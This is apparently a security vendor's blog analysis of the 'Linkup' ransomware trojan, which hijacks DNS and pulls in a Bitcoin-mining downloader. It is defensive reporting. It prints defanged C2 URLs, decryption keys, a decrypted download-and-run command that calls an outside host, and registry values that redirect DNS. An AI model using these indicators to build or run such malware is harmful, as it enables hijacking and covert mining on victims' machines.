Malware Analysis: Ransomware “Linkup” Blocks DNS and Mines Bitcoins
Over the past week, the Emsisoft Malware Analysis team has been closely following a new ransomware Trojan variant that has been detected by Emsisoft Anti-Malware as Trojan-Ransom.Win32.Linkup.
“Linkup” is an interesting piece of ransomware, because unlike previous models it does not directly lock your computer or encrypt files. Instead, Linkup blocks Internet access by modifying your DNS and can also turn your computer into a bitcoin mining robot.
Protecting Yourself from Linkup
Users running Emsisoft Anti-Malware are automatically protected from Linkup, and should block the program when it is identified as Trojan-Ransom.Win32.Linkup. Users who have been infected by Linkup will be blocked from Internet usage and will encounter the following “website” when attempting to browse.
What is encountered is the typical ransomware form, which in this case demands personal information and a payment method to unlock Internet usage. The form states that you will only be charged EUR 0.01, but this is unconfirmed and most likely a blatant lie. Do not submit any personal information! If your computer has been infected, we advise you to find another means of connecting to the Internet and contacting Emsisoft Support to assist you with removal.
How Linkup Works
Once the Linkup Trojan has been executed, it makes a copy of itself in the %AppData%\Microsoft\Windows
directory named svchost.exe
, a fake name meant to mimic a normal file on your computer, which is located in %windir%\system32
. To mark its presence in the system, Linkup creates a mutex named tnd990r
or tnd990s
. We have also found that Linkup will actually disable selected Windows Security and Firewall services to facilitate infection.
Once established on your PC, Linkup contacts its server to provide it with data related to your machine. It does this by sending a POST request to the following address, transmitted in an encrypted state.
What kind of data is Linkup sending its server? When decrypted the “token” value will look like this:
uid=xxxxx&ver=3.55&dl=0&il=0&dip=j5w4FFXB&wl=ENU
&wv=5.1.2600.SP3.0.256.1.2.x86&ia=1
That’s your unique user id (uid), your version of windows (ver), and the language you’re using — in this case ENU, or United States English. This information helps facilitate infection, as Linkup must know what type of computer it is working with if it is to function.
Linkup also gives itself a layer of redundancy, so that if one host fails it can still communicate with another Command and Control server. Decryption reveals the following Command and Control hosts:
hxxp://62.75.221.37/uplink.php?logo.jpg
hxxp://hoseen45r.com/uplink.php?logo.jpg
hxxp://onetimes21s.com/uplink.php?logo.jpg
hxxp://setpec14rs.com/uplink.php?logo.jpg
Linkup decrypts the string with the following key:
IVW-Q3Xo5sBYzDTJK6LPuSrvEkAcghH8lw0GbfFe9dn_MRpqxONZam7ij2yUC14t
Further analysis of Linkup’s body reveals another interesting string, which is actually another decryption key:
Fo6u-YTelBCv0Ac4XiRW_1GJSV2O8jP7nZkbwqLENshpHtg5Kxa3QMfzrUDy9dmI
This key translates commands from Linkup’s server so that the malware can perform them. Upon initial connection, the very first command that is sent looks likes this:
nK_RglbAg_3Axlb0z0bv1Bq6NokWKiej59kcg-WcKlb0f-bvara0Kdk0a0ejr1LvFFXV
Linkup decrypts this command using its key, turning it into this:
IL 62.75.221.37
RUN hxxp://91.220.163.22/pts2.exe
The first command (IL 62.75.221.37
) redirects every HTTP request to the ransomware website, located at 62.75.221.37
, addressed hxxp://62.75.221.37/worlds/test/index.html
. At this point, Linkup will then begin to redirect your DNS so that you end up at the ransomware site whenever you browse.
To redirect every single DNS request, Linkup also makes several changes in the Windows registry, including modifying the following:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\%interfaceGUID%
"NameServer" = "127.0.0.1"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\
%interfaceGUID%
"DhcpNameServer" = "127.0.0.1"
Linkup then finalizes this action by refreshing various Internet/connectivity component settings, in order to ensure the changes it made are effective immediately. It does this by running the following commands:
This redirect is malicious enough, but what it so interesting about Linkup is that it doesn’t stop there. Note the second line of the initial command from the server: RUN hxxp://91.220.163.22/pts2.exe
. This command instructs your computer to download and run the file pts2.exe.
What’s pts2.exe
? A downloader designed to connect your computer to a Bitcoin mining botnet!
Bitcoin Mining Botnet?
The technical processes behind “Bitcoin mining” are complex. For a good summary, consider reading Ken Tiddel’s “Geeks Love The Bitcoin Phenomenon Like They Loved the Internet in 1995,” or Emsisoft’s Attack on Bitcoins.
In the case of Linkup, the most important thing to understand about Bitcoin mining is that if a hacker can get more computing power, he can earn more Bitcoins. That’s why in addition to blocking Internet browsing, Linkup also attempts to connect your computer to a Bitcoin mining botnet, which can combine the computing power of multiple infected computers to earn new Bitcoins for whoever is behind the attack.
Pts2.exe
is a downloader, and it’s placed in the same directory as the fake svchost.exe
file we started this analysis out with. Behind the scenes, pts2.exe
is actually formatted as Update_%random%.exe
. This is a .NET based file designed to download and execute another file from hxxp://64.32.28.155/b.exe
and store it in C:\Users\Public\b.exe.
Upon further analysis, our malware team identified this “other file” to be a self-extracting RAR that extracts several script files and one executable. The SFX script executes a 64-bit PE file, named j.exe, which is jhProtominer
. As the name suggests, jhProtominer
is a Bitcoin mining application.
This combination of ransomware and Bitcoin mining is a new and fascinating development. At this point, however, its functionality is still quite limited as the downloaded jhProtominer
only works on 64-bit operating systems. In time, it will be interesting to see if Linkup is modified to download more flexible variants.
Hashes of files analyzed in this article
- Trojan-Ransom.Win32.Linkup
MD5: f1304992523cd68f7412a355d2fb9d5d
SHA1: ce70e50707b456e0e2f086126bdcfa266d5a57ae
- pts2.exe (Bitcoin miner downloader)
MD5: 7eb809d8ea5bfe602648752289669632
SHA1: 20bd75b9c47ac075d51783a5f3c5309091c7c6a7
- b.exe (Bitcoin miner package – Self-extracting Archive)
MD5: 29eea4cd040bff1028d5b6092f22f9bf
SHA1: 1b3389328f9ebf706f09445ca0adc5efd2e98f79
- j.exe (jhProtominer)
MD5: 2e9a71e4ee33d190056e081e6726fa56
SHA1: db355fc276b8174e1753f45dbdf52536f7740316
What do you think about Linkup?
In the coming weeks, Emsisoft’s Malware Analysis team will be keeping a close eye on Linkup, as the malware will inevitably evolve. We have provided this analysis because Linkup represents a new approach to infection, which combines two known techniques — ransomware and Bitcoin mining — to create one potent form of money making malware.
If you have any questions about Linkup, we encourage you to contact Emsisoft Support directly. There, you can share your thoughts or even your own discoveries to help Emsisoft in its mission of making the world a more malware-free place. In the meantime, steer clear of the mines, and have a great (ransomware-free) day!